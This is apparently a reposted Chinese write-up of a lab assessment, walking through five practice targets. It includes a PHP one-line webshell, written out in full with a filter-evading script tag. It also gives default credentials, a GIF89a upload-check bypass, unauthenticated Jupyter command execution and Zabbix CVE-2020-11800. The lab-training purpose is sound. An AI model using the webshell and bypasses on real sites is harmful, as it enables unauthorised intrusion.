記一次360眾測靶場考核


記一次360靶場考核

第一輪理論題

百度搜答案即可= =

第二輪實戰考核

第一題 拆舊有限公司

打開環境是一個公司官網

隨便點了點沒發現什么東西
別慌

掃一下目錄,看看能不能掃到后台或者敏感路徑之類的突破口

果然,直接掃到了后台

嘗試了一下弱密碼admin/admin888成功登錄
發現是一個備份文件后台

通過抓包修改備份文件內容和文件名
這里嘗試上傳一句話

成功連接shell

第二題 圖書館公共網絡存儲網盤

打開環境是一個登錄頁面

發現它有一個”非注冊用戶上傳文件“的功能

經過測試發現檢測了文件頭
所以這里用GIF89a來繞過文件頭檢測,
再次上傳一句話時,發現還過濾了<?
決定用\<script\>標簽php一句話木馬來繞過<?的過濾。

<script language="php">
@eval($_POST['shell']);
</script>

但怎么都不解析PHP

沒有思路的時候,重新看了一遍上傳功能

!!!!!突然發現
URL中存在文件包含

成功拿下

第三題

上傳繞過方法與第二題一致就不過多敘述

第四題 WEB應用管理

jupyter的未授權訪問遠程命令執行
漏洞編號:SSV-99338
漏洞描述:管理員未為Jupyter Notebook配置密碼,將導致未授權訪問漏洞,游客可在其中創建一個console並執行任意Python代碼和命令
執行系統命令

ovyan@1904042cf343:~$vyan@1904042cf343:~$ ls ../../
bin  boot  dev  etc  home  KEY_10b6e8259961.txt  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
jovyan@1904042cf343:~$ cat /KEY_10b6e8259961.txt
mozhe7addd24523b82e0e371b5f7c7dg

第五題 智谷運維管理系統

漏洞編號:CVE-2020-11800
Zabbix Server的trapper命令處理,
存在命令注入漏洞,可導致遠程代碼執行

弱口令登錄后台admin/Zabbix




拿下

附:


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM